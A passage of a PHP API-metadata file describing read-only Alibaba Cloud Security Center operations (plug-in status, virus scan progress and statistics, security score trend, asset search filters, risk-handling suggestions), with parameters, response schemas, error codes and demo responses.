You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => 'EA54FE21-B006-5DFF-8D64-C4FFECDA****', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'RdCheckNoPermission', 'errorMessage' => 'Resource directory account verification has no permission.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ['errorCode' => 'RdCheckInnerError', 'errorMessage' => 'Resource directory account service internal error.', 'description' => ''], ], ], 'title' => 'Query baseline details', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeRisks'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeRisks', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Risks\\": [\\n {\\n \\"RiskId\\": 54,\\n \\"RiskName\\": \\"Alibaba Cloud Standard - Ubuntu Security Baseline\\",\\n \\"RiskDetail\\": \\"Ubuntu 14, Ubuntu 16, Ubuntu 18, Ubuntu 20 baseline based on Alibaba Cloud best security practices\\",\\n \\"RiskType\\": \\"cis\\",\\n \\"TypeAlias\\": \\"Best security practices\\",\\n \\"SubRiskType\\": \\"hc_ubuntu\\",\\n \\"SubTypeAlias\\": \\"Alibaba Cloud Standard - Ubuntu Security Baseline\\"\\n }\\n ],\\n \\"TotalCount\\": 23,\\n \\"RequestId\\": \\"EA54FE21-B006-5DFF-8D64-C4FFECDA****\\"\\n}","type":"json"}]', ], 'DescribeSasPmAgentList' => [ 'summary' => 'Queries the status list of O&M plug-ins.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsas36IOGX'], ], 'parameters' => [ [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language type for the request and response. Default value: **zh**. Valid values:'."\n" .'- **zh**: Chinese'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'en', 'title' => ''], ], [ 'name' => 'Uuids', 'in' => 'query', 'schema' => ['description' => 'The UUIDs of the servers to query. Separate multiple UUIDs with commas (,).', 'type' => 'string', 'required' => true, 'example' => 'inet-cb7ae5ee-b2bc-4581-b616-62495f5d****,inet-37cf0e4f-55cc-4b84-8073-b348b4b4****', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID.', 'type' => 'string', 'example' => '8EF3ACC2-9400-5B64-B72D-4A1D35113750', 'title' => ''], 'SasPmAgentList' => [ 'description' => 'The query result list.', 'type' => 'array', 'items' => [ 'description' => 'The analysis result list.', 'type' => 'object', 'properties' => [ 'AliyunAssistId' => ['title' => '', 'description' => 'The globally unique ID of Cloud Assistant.', 'type' => 'string', 'example' => 'mi-hz034jn***yxhc0'], 'AliyunMonitorId' => ['title' => '', 'description' => 'The globally unique ID of CloudMonitor.', 'type' => 'string', 'example' => '5d5ef6be-54ff-11ed-82cf-8f01475e****'], 'AssistInstallStatus' => [ 'description' => 'The installation status of Cloud Assistant. Valid values:'."\n" .'- **0**: Installing.'."\n" .'- **1**: Installed.'."\n" .'- **2**: Installation failed.'."\n" .'- **3**: Installation timed out.', 'enumValueTitles' => [], 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => '', ], 'MonitorInstallStatus' => [ 'description' => 'The installation status of CloudMonitor. Valid values:'."\n" .'- **0**: Failed.'."\n" .'- **1**: Succeeded.', 'enumValueTitles' => [], 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => '', ], 'AssistInstallResult' => [ 'description' => 'The installation execution result of Cloud Assistant. Valid values:'."\n" .'- **0**: SUCCESS'."\n" .'- **1**: MISSING_PARAM'."\n" .'- **2**: UNKNOWN_SYSTEM'."\n" .'- **3**: DOWNLOAD_FAILED'."\n" .'- **4**: INSTALL_FAILED.', 'enumValueTitles' => [], 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => '', ], 'MonitorInstallResult' => [ 'description' => 'The installation execution result of CloudMonitor. Valid values:'."\n" .'- **0**: Failed.'."\n" .'- **1**: Succeeded.', 'enumValueTitles' => [], 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => '', ], 'Uuid' => ['title' => '', 'description' => 'The UUID of the server.', 'type' => 'string', 'example' => '87f1724d-075e-48d3-95fd-78c2dd36****'], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'ConsoleError', 'errorMessage' => 'The error message is %s %s.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query O&M plug-in status list', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeSasPmAgentList'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeSasPmAgentList', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"8EF3ACC2-9400-5B64-B72D-4A1D35113750\\",\\n \\"SasPmAgentList\\": [\\n {\\n \\"AliyunAssistId\\": \\"mi-hz034jn***yxhc0\\",\\n \\"AliyunMonitorId\\": \\"5d5ef6be-54ff-11ed-82cf-8f01475e****\\",\\n \\"AssistInstallStatus\\": 1,\\n \\"MonitorInstallStatus\\": 1,\\n \\"AssistInstallResult\\": 0,\\n \\"MonitorInstallResult\\": 1,\\n \\"Uuid\\": \\"87f1724d-075e-48d3-95fd-78c2dd36****\\"\\n }\\n ]\\n}","type":"json"}]', ], 'DescribeScanTaskProgress' => [ 'summary' => 'Queries the progress of a virus scan task.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'TaskId', 'in' => 'query', 'schema' => ['description' => 'The ID of the virus scan task that you want to query.'."\n" .'> You can call the [StartVirusScanTask](~~StartVirusScanTask~~) operation to obtain this parameter.', 'type' => 'integer', 'format' => 'int64', 'required' => true, 'example' => '282832', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'TargetInfo' => ['description' => 'The asset information scanned by the virus scan node. This parameter is a string converted from a JSON array in character format. The following fields are included:'."\n" .'- **type**: The Asset Type on which the virus scan is executed. Valid values:'."\n" .' - **groupId**: server group.'."\n" .' - **uuid**: server.'."\n" .'- **name**: The name of the server group or server.'."\n" .'- **target**: The asset on which the virus scan is executed. The following describes the values of this field:'."\n" .' - If **type** is set to **groupId**, this field specifies the server group ID.'."\n" .' - If **type** is set to **uuid**, this field specifies the UUID of the server.', 'type' => 'string', 'example' => '[{"type":"uuid","name":"host001","target":"503201a7-14c6-4280-801b-1169ed42****"}]', 'title' => ''], 'RequestId' => ['description' => 'The request ID. Alibaba Cloud generates a unique ID for each request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => 'EA15BA8A-D631-4375-8D40-CB7C769B0279', 'title' => ''], 'ScanTaskProgress' => ['description' => 'The progress of the virus scan task. Valid values:'."\n" .'- **init**: The scan task is being initialized.'."\n" .'- **Processing**: The scan task is in progress.'."\n" .'- **Success**: The scan task is complete.'."\n" .'- **Failed**: The scan task failed.', 'type' => 'string', 'example' => 'Success', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query virus scan task progress', 'responseParamsDescription' => ' ', 'extraInfo' => ' ', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeScanTaskProgress'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeScanTaskProgress', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"TargetInfo\\": \\"[{\\\\\\"type\\\\\\":\\\\\\"uuid\\\\\\",\\\\\\"name\\\\\\":\\\\\\"host001\\\\\\",\\\\\\"target\\\\\\":\\\\\\"503201a7-14c6-4280-801b-1169ed42****\\\\\\"}]\\",\\n \\"RequestId\\": \\"EA15BA8A-D631-4375-8D40-CB7C769B0279\\",\\n \\"ScanTaskProgress\\": \\"Success\\"\\n}","type":"json"}]', ], 'DescribeScanTaskStatistics' => [ 'summary' => 'Queries the statistics of virus detection tasks.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'Levels', 'in' => 'query', 'schema' => ['description' => 'The severities of the alert events handled by the virus detection task. Separate multiple severities with commas (,). The severities decrease in descending order. Valid values:'."\n" ."\n" .'* **serious**'."\n" .'* **suspicious**'."\n" .'* **remind**'."\n", 'type' => 'string', 'required' => false, 'example' => 'serious,suspicious,remind', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'TotalTaskNum' => ['description' => 'The total number of virus detection tasks.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '11', 'title' => ''], 'UserNum' => ['description' => 'The number of risks that are detected for the user.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '11', 'title' => ''], 'RequestId' => ['description' => 'The request ID.'."\n", 'type' => 'string', 'example' => '765EDBDE-1686-5DBA-B76F-2E0XXXXXXX', 'title' => ''], 'DealedRiskNum' => ['description' => 'The number of risks that are handled for the user.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '11', 'title' => ''], 'PersonalTaskNum' => ['description' => 'The total number of tasks that are created for the user.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '11', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"TotalTaskNum\\": 11,\\n \\"UserNum\\": 11,\\n \\"RequestId\\": \\"765EDBDE-1686-5DBA-B76F-2E0XXXXXXX\\",\\n \\"DealedRiskNum\\": 11,\\n \\"PersonalTaskNum\\": 11\\n}","type":"json"}]', 'title' => 'DescribeScanTaskStatistics', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeScanTaskStatistics'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeScanTaskStatistics', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'DescribeScreenScoreThread' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '154024', 'abilityTreeNodes' => ['FEATUREsasBB3BJE'], ], 'parameters' => [ [ 'name' => 'StartTime', 'in' => 'query', 'schema' => ['description' => 'The start time as a timestamp. Unit: milliseconds.', 'type' => 'integer', 'format' => 'int64', 'required' => true, 'example' => '1651290987000', 'title' => ''], ], [ 'name' => 'EndTime', 'in' => 'query', 'schema' => ['description' => 'The end time as a timestamp. Unit: milliseconds.', 'type' => 'integer', 'format' => 'int64', 'required' => true, 'example' => '1668064495000', 'title' => ''], ], [ 'name' => 'Source', 'in' => 'query', 'schema' => ['description' => 'The source of the security score. If left empty, the default value is Security Center. Valid values:'."\n" ."\n" .'0: Security Center.'."\n" ."\n" .'1: Alibaba Cloud ApsaraDB console.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '0', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => 'D03DD0FD-6041-5107-AC00-383E28F1****', 'title' => ''], 'Data' => [ 'description' => 'The returned data.', 'type' => 'object', 'properties' => [ 'SocreThread' => [ 'description' => 'The security score trend list.', 'type' => 'array', 'items' => ['description' => 'The security score.', 'type' => 'string', 'example' => '80', 'title' => ''], 'title' => '', 'example' => '', ], 'SocreThreadDate' => [ 'description' => 'The security score trend date list.', 'type' => 'array', 'items' => ['description' => 'The security score trend date.', 'type' => 'string', 'example' => '2024-07-01', 'title' => ''], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query security dashboard score trend', 'summary' => 'Queries the security score trend on the security dashboard.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeScreenScoreThread'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeScreenScoreThread', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"D03DD0FD-6041-5107-AC00-383E28F1****\\",\\n \\"Data\\": {\\n \\"SocreThread\\": [\\n \\"80\\"\\n ],\\n \\"SocreThreadDate\\": [\\n \\"2024-07-01\\"\\n ]\\n }\\n}","type":"json"}]', ], 'DescribeSearchCondition' => [ 'summary' => 'Queries the filter conditions that are used to search for assets.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'abilityTreeCode' => '92187', 'abilityTreeNodes' => ['FEATUREsas36IOGX'], ], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The source IP address of the request.'."\n", 'type' => 'string', 'required' => false, 'example' => '117.220.XX.XX', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the content within the request and response. Default value: **zh**. Valid values:'."\n" ."\n" .'* **zh**: Chinese.'."\n" .'* **en**: English.'."\n", 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'Type', 'in' => 'query', 'schema' => ['description' => 'The type of the asset. Valid values:'."\n" ."\n" .'* **ecs**: Elastic Compute Service (ECS) instances.'."\n" .'* **cloud_product**: cloud services except ECS.'."\n", 'type' => 'string', 'required' => false, 'example' => 'ecs', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'description' => 'The response parameters.'."\n", 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.', 'type' => 'string', 'example' => '3AEC47AF-8CFA-485E-AC9A-3A8ABC06EA7F', 'title' => ''], 'ConditionList' => [ 'description' => 'An array that consists of the filter conditions.'."\n", 'type' => 'array', 'items' => [ 'description' => 'The information about the filter condition.'."\n", 'type' => 'object', 'properties' => [ 'ConditionType' => ['description' => 'The type of the filter condition. Valid values:'."\n" ."\n" .'* **system**: default filter conditions.'."\n" .'* **user**: custom filter conditions.'."\n", 'type' => 'string', 'example' => 'system', 'title' => ''], 'NameKey' => ['description' => 'The key of the filter condition name.'."\n", 'type' => 'string', 'example' => 'stop_machine', 'title' => ''], 'Name' => ['description' => 'The filter condition name.'."\n", 'type' => 'string', 'example' => 'StopMachine', 'title' => ''], 'FilterConditions' => ['description' => 'The filter condition. The value of this parameter is in the JSON format and contains the following fields:'."\n" ."\n" .'* **filterParams**: the parameters of the filter condition. The value of this field is in the JSON format and contains the following fields:'."\n" ."\n" .' * **labelKey**: the key for rendering.'."\n" ."\n" .' * **label**: the display name.'."\n" ."\n" .' * **value**: the value of the filter condition. The value of this field is in the JSON format and contains the following fields:'."\n" ."\n" .' * **name**: the name of the filter item.'."\n" .' * **value**: the value of the filter item.'."\n" ."\n" .'* **LogicalExp**: the logical relationship among the filter conditions. Valid values:'."\n" ."\n" .' * **AND**: The filter conditions are evaluated by using a logical **AND**.'."\n" .' * **OR**: The filter conditions are evaluated by using a logical **OR**.'."\n" ."\n" .'> If the value of **ConditionType** is **system**, **labelKey** is returned. The labelKey field is used only for internationalization rendering.'."\n", 'type' => 'string', 'example' => '{\\"filterParams\\":[{\\"labelKey\\":\\"a|b\\",\\"value\\":\\"{\\\\\\"name\\\\\\":\\\\\\"sadsasd\\\\\\",\\\\\\"value\\\\\\":\\\\\\"dasdsdas\\\\\\"}\\"}],\\"LogicalExp\\":\\"OR\\"}', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'no permission', 'description' => ''], ['errorCode' => 'InvalidSecurityTokenExpired', 'errorMessage' => 'Specified SecurityToken is expired.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'eventInfo' => [ 'enable' => false, 'eventNames' => [], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"3AEC47AF-8CFA-485E-AC9A-3A8ABC06EA7F\\",\\n \\"ConditionList\\": [\\n {\\n \\"ConditionType\\": \\"system\\",\\n \\"NameKey\\": \\"stop_machine\\",\\n \\"Name\\": \\"StopMachine\\",\\n \\"FilterConditions\\": \\"{\\\\\\\\\\\\\\"filterParams\\\\\\\\\\\\\\":[{\\\\\\\\\\\\\\"labelKey\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"a|b\\\\\\\\\\\\\\",\\\\\\\\\\\\\\"value\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"{\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\"name\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\":\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\"sadsasd\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\"value\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\":\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\"dasdsdas\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\"}\\\\\\\\\\\\\\"}],\\\\\\\\\\\\\\"LogicalExp\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"OR\\\\\\\\\\\\\\"}\\"\\n }\\n ]\\n}","type":"json"}]', 'title' => 'DescribeSearchCondition', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeSearchCondition'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeSearchCondition', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'DescribeSecureSuggestion' => [ 'summary' => 'Query Security Risk Handling Suggestions Details', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '92188', 'abilityTreeNodes' => ['FEATUREsasJODUMM'], ], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The IP address of the access source.', 'type' => 'string', 'required' => false, 'example' => '192.168.XX.XX', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language type for request and response messages, default is **zh**. Values:'."\n" .'- **zh**: Chinese'."\n" .'- **en**: English'."\n", 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'CalType', 'in' => 'query', 'schema' => ['description' => 'Choose to query the new or old version of the security score rules. When the value is **home_security_score**, it queries the new version of the security score rules; otherwise, it defaults to querying the old version of the security score rules.', 'type' => 'string', 'required' => false, 'example' => 'home_security_score', 'title' => ''], ], [ 'name' => 'Source', 'in' => 'query', 'schema' => ['description' => 'Source of the security score. If left empty, it defaults to Cloud Security Center. Enumerated values:'."\n" ."\n" .'- 0: Cloud Security Center.'."\n" ."\n" .'- 1: Yaochi Console.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '0', 'title' => ''], ], [ 'name' => 'ResourceDirectoryAccountId', 'in' => 'query', 'schema' => ['description' => 'Resource directory member account ID (Alibaba Cloud account).'."\n" .'> You can obtain this parameter by calling the [DescribeMonitorAccounts](~~DescribeMonitorAccounts~~) API.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1232428423234****', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of this call request, which is a unique identifier generated by Alibaba Cloud for this request, and can be used to troubleshoot and locate issues.', 'type' => 'string', 'example' => '676F80E3-4B3F-43DA-9CBB-5FF79F202AA2', 'title' => ''], 'TotalCount' => ['description' => 'The total number of security risks that need to be reinforced.', 'type' => 'integer', 'format' => 'int32', 'example' => '15', 'title' => ''], 'Score' => ['description' => 'Security score.', 'type' => 'string', 'example' => '95', 'title' => ''], 'CalTime' => ['description' => 'Timestamp of the security score calculation.', 'type' => 'integer', 'format' => 'int64', 'example' => '1755744253000', 'title' => ''], 'Suggestions' => [ 'description' => 'List of security risk handling suggestions.', 'type' => 'array', 'items' => [ 'description' => 'List of security risk handling suggestions.', 'type' => 'object', 'properties' => [ 'Points' => ['description' => 'Deduction value for a single deduction item.', 'type' => 'integer', 'format' => 'int32', 'example' => '40', 'title' => ''], 'SuggestType' => ['description' => 'Type of the pending security risk. Values:'."\n" .'- **SS_REINFORCE**: Key features not configured (e.g., malicious host behavior defense)'."\n" .'- **SS_ALARM**: Pending alerts'."\n" .'- **SS_VUL**: Vulnerabilities to be fixed'."\n" .'- **SS_HC**: Baseline issues'."\n" .'- **SS_AK**: AK leakage issues '."\n" .'- **SS\\_CLOUD_HC**: Cloud platform configuration risks'."\n" .'- **OTHER**: Other', 'type' => 'string', 'example' => 'SS_ALARM', 'title' => ''], 'Detail' => [ 'description' => 'Details of the security risk handling suggestions.', 'type' => 'array', 'items' => [ 'description' => 'Details of the security risk handling suggestions.', 'type' => 'object', 'properties' => [ 'Title' => ['description' => 'Name of the pending security risk item.', 'type' => 'string', 'example' => 'Website tamper-proofing capability not configured', 'title' => ''], 'Description' => ['description' => 'Description of the security risk handling suggestion.', 'type' => 'string', 'example' => 'Malicious tampering of Web pages will affect your normal access to web page content, and may also lead to serious economic losses, brand losses, and even political risks. The webpage tamper-proof service can monitor the website directory in real time and restore the tampered files or directories through backup, so as to ensure that the website information of important systems is not tampered with maliciously and prevent the occurrence of horse hanging, black chain, illegal implantation of terrorist threats, pornography and other content.', 'title' => ''], 'SubType' => ['description' => 'Types of pending security risks. The values include:'."\n" .'- **ALARM_HIGH**: Unhandled high-risk alert events'."\n" .'- **ALARM_MEDIUM**: Unhandled medium-risk alert events'."\n" .'- **ALARM_LOW**: Unhandled low-risk alert events'."\n" .'- **VUL_EMR_UNCHECK**: Unchecked urgent vulnerabilities'."\n" .'- **VUL_EMR_UNFIX**: Unfixed urgent vulnerabilities'."\n" .'- **VUL_WIN**: Unfixed Windows server vulnerabilities'."\n" .'- **VUL_LINUX**: Unfixed Linux server vulnerabilities'."\n" .'- **VUL_CMS**: Unfixed CMS vulnerabilities'."\n" .'- **ACCESSKEY_LEAK**: AccessKey leakage risks'."\n" .'- **HC_WARN**: Baseline risks'."\n" .'- **HC_WEAK_EXPLOIT_WARN**: Risks of weak passwords exposed by the public network'."\n" .'- **HC_WEAK_PASSWORD_WARN**: Risk of weak password'."\n" .'- **HC_HIGH_EXPLOIT_WARN**: High risk of being invaded'."\n" .'- **HC_OTHER_WARN**: Security configuration risks'."\n" .'- **HC_DATABASE_WARN**: Database has security risks'."\n" .'- **CLOUD_HC_SAS_OPEN**: Security protection not installed on the server'."\n" .'- **CLOUD_HC_AEGIS_OFFLINE**: Server protection status is offline'."\n" .'- **CLOUD_HC_ACCOUNT_DOUBLE_CHECK**: Two-Factor Authentication not enabled for primary account'."\n" .'- **CLOUD_HC_RDS**: RDS database security policy check failed, posing security risks'."\n" .'- **CLOUD_HC_DDOS**: Risks in Anti-DDoS Pro back-to-origin settings'."\n" .'- **CLOUD_HC_HIGH_LEVEL**: Cloud product configuration with high risk'."\n" .'- **CLOUD_HC_OTHER_LEVEL**: Cloud product configuration with medium and low risks'."\n" .'- **OTHER_ATTACH**: Attack incidents'."\n" .'- **OTHER_DATABASE_ATTACH**: Database has security risks'."\n" .'- **REINFORCE_BASELINE**: Config assessment'."\n" .'- **REINFORCE_SUSPICIOUS**: Antivirus'."\n" .'- **REINFORCE_ANALYSIS**: Log analysis'."\n" .'- **REINFORCE_AK_LEAK**: AccessKey leaked intelligence detection'."\n" .'- **REINFORCE_WEB_LOCK**: Website tamper-proofing capability not configured'."\n" .'- **REINFORCE_BRUTE_FORCE**: Anti-brute force cracking'."\n" .'- **REINFORCE_XPRESS_INSTALL**: One-click client installation'."\n" .'- **REINFORCE_RANSOMWARE**: Enable anti-ransomware strategy'."\n" .'- **REINFORCE_UNI_RANSOMWARE**: Anti-ransomware for databases'."\n" .'- **REINFORCE_VIRUS_SCHEDULE_SCAN**: Periodic virus scan policies not configured'."\n" .'- **REINFORCE_IMAGE_REPO_SCAN**: No container image scan range configured'."\n" .'- **REINFORCE_IMAGE_SCAN_TASK**: Image security scan'."\n" .'- **REINFORCE_K8S_LOG_ANALYSIS**: Container K8s threat detection is disabled'."\n" .'- **REINFORCE_CONTAINER_NETWORK**: Container visualization', 'type' => 'string', 'example' => 'REINFORCE_WEB_LOCK', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'no permission', 'description' => ''], ['errorCode' => 'RdCheckNoPermission', 'errorMessage' => 'Resource directory account verification has no permission.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ['errorCode' => 'RdCheckInnerError', 'errorMessage' => 'Resource directory account service internal error.', 'description' => ''], ], ], 'responseDemo' => '[{"type":"json","example":"{\\n \\"RequestId\\": \\"676F80E3-4B3F-43DA-9CBB-5FF79F202AA2\\",\\n \\"TotalCount\\": 15,\\n \\"Score\\": \\"95\\",\\n \\"CalTime\\": 1755744253000,\\n \\"Suggestions\\": [\\n {\\n \\"Points\\": 40,\\n \\"SuggestType\\": \\"SS_ALARM\\",\\n \\"Detail\\": [\\n {\\n \\"Title\\": \\"Website tamper-proofing capability not configured\\",\\n \\"Description\\": \\"Malicious tampering of Web pages will affect your normal access to web page content, and may also lead to serious economic losses, brand losses, and even political risks. The webpage tamper-proof service can monitor the website directory in real time and restore the tampered files or directories through backup, so as to ensure that the website information of important systems is not tampered with maliciously and prevent the occurrence of horse hanging, black chain, illegal implantation of terrorist threats, pornography and other content.\\",\\n \\"SubType\\": 